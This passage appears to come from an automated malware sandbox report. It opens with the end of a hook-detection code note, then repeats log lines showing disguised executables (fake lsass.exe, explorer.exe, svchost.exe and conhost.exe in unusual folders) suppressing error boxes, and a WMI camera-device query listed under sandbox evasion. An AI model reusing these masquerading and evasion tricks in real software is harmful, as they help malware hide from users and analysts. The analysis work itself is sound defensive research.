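        print(f"write at {addr:#x}: jmp {dst:#x} ({dst - addr:+#x} bytes)")
    for a, b in linked_pairs(WRITES):
        print(f"linked: {a:#x} <-> {b:#x}")
```

On these four rows the write at 7FFDB4590008 jumps to 7FFDB442D9F8 and the write at 7FFDB442D9F0 jumps to 7FFDB4590015, thirteen bytes past the first patch; the other two writes link 7FFDB45A000D and 7FFDB445CBC0 the same way. Resolving the two regions against the process's module list (which image each address falls in, and whether the destination leaves that image) is what turns the pairing into a hook verdict.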
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockhostnet\msinto.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe    Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\debug\explorer.exe    Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe    WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
